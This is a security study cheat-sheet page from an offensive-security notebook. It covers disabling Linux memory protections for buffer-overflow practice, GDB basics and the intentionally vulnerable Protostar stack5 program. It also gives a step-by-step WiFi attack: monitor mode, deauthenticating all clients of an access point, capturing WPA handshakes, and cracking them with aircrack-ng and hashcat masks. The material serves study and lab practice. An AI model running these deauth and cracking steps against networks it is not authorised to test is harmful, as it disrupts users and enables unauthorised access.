0Sec
0Sec
0Sec
  • Spider Security
  • offensive security
    • OSCP
      • WriteUps
        • PortSwigger
          • SQL injection labs
          • Exploiting XXE to retrieve data by repurposing a local DTD
        • PentesterLabs
          • Recon
        • HTB
          • BoardLight
          • Lame
        • THM
          • Walkthroughs
            • Attacktive Directory
            • LineKernel
            • Day 1 — Linux PrivEsc
          • CTF
            • Page
            • BLUE
            • mKingdom
            • RazorBlack
      • Module 1 (General Info)
      • Module 2 (Getting Kali)
        • Leason 1 - Booting Up Kali Linux
        • Leason 2 - The Kali Menu
        • Leason 4 - Finding Your Way Around Kali
        • Leason 5 - Managing Kali Linux Services
      • Module 3 (CLI)
        • The Bash Environment
        • Piping and Redirection
        • Text Searching and Manipulation
          • Regular
        • Managing Processes
        • File and Command Monitoring
      • Module 4 (Practical Tools)
        • Netcat
        • Socat
        • PowerShell & Powercat
        • Wireshark
        • Tcpdump
      • Module 5 (Bash Script)
      • Module 6 (Passive Info Gathering)
      • Module 7 ( Active Info Gathering)
      • Module 8 (Vulnerability Scanning)
      • Module 9 (Web Application Attacks)
        • Cross Site Scripting (XSS)
        • local file inclusion & remote file inclusion
          • Exploit LFI
        • SQL injection
          • Blind Boolean based SQL & Evasion Techniques
          • SQL
          • Login bypass List
        • File upload
        • Remote code execution
      • Module 10 ( Intro Buffer OverFlow)
      • Module 11 (Widows Buffer OverFlow)
        • Buffer OverFlow Challange
      • Module 12 (Linux Buffer OverFlows)
      • Module 13 (Clint Side Attacks)
      • Module 14 (Locating Public Exploits)
      • Module 15 (FIxing Exploits)
      • Module 16 (File Transfers)
      • Module 17 (Antivirus Evasion)
        • Windows
      • Module 18 (Privllege Escalation)
        • Windows
          • Checklist
          • THM - Windows PrivEsc Arena
        • Linux
          • Checklist
          • Linux PrivEsc Arena
      • Module 19 (Password Attacks)
      • Module 20 (Port Redirection and Tunneling)
      • Module 21 (Active Directory Attacks)
        • adbasics_v1.2
      • Module 22 (Metasploit Framwork)
      • Module 23 (Powershell Empire)
      • Course Materials
  • SANS
  • AppSec
    • EWAPTX
      • PHP Type Juggling
      • CSP
      • SqlI
        • Information_schema
        • WriteUps
      • SSTI & CSTI
      • XSS_HTML Injection
      • CORS Attack
      • Clickjacking
      • Open redirect
      • JSONP
      • LFI && LFD && RFI
      • HTTP Host header attacks
      • CSRF
      • XML injection
      • XML external entity (XXE) injection
      • APIs & JWT attacks
      • Insecure Deserialization
      • OAUTH 2.0 authentication vulnerabilities
      • Host Header Injection
      • Insecure Direct Object References (IDOR)
  • Reverse Eng & Malware dev
    • Internals
      • Windows internals
        • Topics in GitHub
        • Chapter 1 Concepts and tools
        • Chapter 2. System architecture
        • Chapter 3. Processes and jobs
        • Chapter 4. Threads
        • Chapter 5. Memory management
        • Chapter 6. I/O system
        • Chapter 7. Security
      • Linux internals ⇒ Soon
      • MacOs X internals ⇒ Soon
  • cheat sheet
    • Pentest_Notes
    • Linux BOF & Wireless Attacks
    • WriteUps
Powered by GitBook
On this page
  • GDB Basics Cheat Sheet
  • Exploit Vuln program
  • Wireless
  • start monitoring
  • Attacking target:
  • Cracking Authentication keys
  1. cheat sheet

Linux BOF & Wireless Attacks

Environment setup

  1. install edb

sudo apt-get install edb
  1. disable ASLR and DEP on linux

sudo bash -c "echo 0 > /proc/sys/kernel/randomize_va_space"
cat /proc/sys/kernel/randomize_va_space

sudo nano /etc/default/grub
# GRUB_CMDLINE_LINUX_DEFAULT="quiet splash noexec=off noexec32=off clearcpuid=514"
sudo update-grub
sudo reboot
  1. edb is pretty much the same as immunity debugger you can do the same steps as we did on windows.

GDB Basics Cheat Sheet

Starting and Quitting

  • gdb <program>: Start GDB with a program.

  • run or r: Start the program.

  • quit or q: Exit GDB.

Breakpoints

  • break <location> or b <location>: Set a breakpoint.

  • info breakpoints or i b: List breakpoints.

  • delete <num> or d <num>: Delete a breakpoint.

Stepping and Continuing

  • next or n: Step to the next line (skip functions).

  • step or s: Step into a function.

  • continue or c: Continue execution.

Inspecting Variables and Memory

  • print <expr> or p <expr>: Print value of an expression.

  • x/<format> <address>: Examine memory (e.g., x/4x for 4 hex values).

  • info locals: Show local variables.

Stack and Frames

  • backtrace or bt: Show the call stack.

  • frame <num> or f <num>: Switch to a frame.

  • info frame: Show details of the current frame.

Running and Control

  • kill: Stop program execution.

  • jump <location>: Jump to a line or address.

Threads

  • info threads: List threads.

  • thread <num>: Switch to a thread.

Exploit Vuln program

  • protostar stack5

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
  char buffer[64];

  gets(buffer);
}
  • compile 32-bit program with no ASLR and no execution protection

gcc -m32 -no-pie -fno-stack-protector stack5.c -o stack5 

Wireless

Config Adapter TP-Link TL-WN722N v2/v3 [Realtek RTL8188EUS]

  • check Adapter info

iwconfig
lsusb
  • install required drivers

sudo apt install realtek-rtl8188eus-dkms -y

start monitoring

  • check the wireless adapter for monitor mode:

sudo airmon-ng check kill
  • Start monitor mode on the wireless interface, this will change the interface name to wlan0mon

sudo airmon-ng start wlan0 
  • Now let’s capture the wireless packets that fly around us on the air to know what wifi networks available.

sudo airodump-ng wlan0

BSSID: The MAC address (unique identifier) of the access point or router.

ESSID: The network name (SSID) broadcast by the access point.

ENC: The encryption protocol used (e.g., WEP, WPA, WPA2).

Cipher: The encryption algorithm used for securing the data (e.g., CCMP, TKIP).

Auth: The authentication method (e.g., PSK, MGT) used to verify devices connecting to the network.

Channel: The specific frequency band used on which the access point is operating.

Network power:

Attacking target:

  • Capturing the target traffic to/from clients to get authentication handshakes.

sudo airodump-ng –w captures -c <channel> –bssid <MAC Address> wlan0
  • De-authenticate all clients to force them authenticate and then capture the authentication packets.

sudo aireplay-ng --deauth 0 -a <MAC Address of AP> wlan0
  • No try to capture authentication handshakes again.

Inspecting the captured traffic with wireshark:

wireshark capture-01.cap

In Wireshark we want to filter with eapol to get the 4-way handshake for WiFi connections.

Cracking Authentication keys

  • Put the interface back to managed mode

sudo airmon-ng stop wlan0mon
  • Cracking

sudo aircrack-ng <pcap-file> -w /usr/share/wordlists/rockyou.txt

Cracking with hashcat

./cap2hccapx.bin input.pcap output.hccapx [filter by essid] [additional network essid:bssid]
  1. Brute Force Attack for 8 Digits

hashcat -m 2500 -a 3 <OUTPUT_FILE>.hccapx ?d?d?d?d?d?d?d?d
  1. Brute Force Attack for 8 Characters (Digits and Alphabet)

hashcat -m 2500 -a 3 <OUTPUT_FILE>.hccapx ?a?a?a?a?a?a?a?a

?a: Represents any alphanumeric character (lowercase, uppercase, digits, and symbols).

  1. brute force lower letters

hashcat -m 2500 -a 3 <OUTPUT_FILE>.hccapx ?l?l?l?l?l?l?l?l
  1. Brute Force Attack for 8 to 11 Digits

hashcat -m 2500 -a 3 <OUTPUT_FILE>.hccapx ?d?d?d?d?d?d?d?d --increment --increment-min=8 --increment-max=11
PreviousPentest_NotesNextWriteUps

Last updated 8 months ago

WF_S_S_4@2x.webp

Convert the cap file to hash with hashcat utils or using this web app:

https://hashcat.net/cap2hashcat/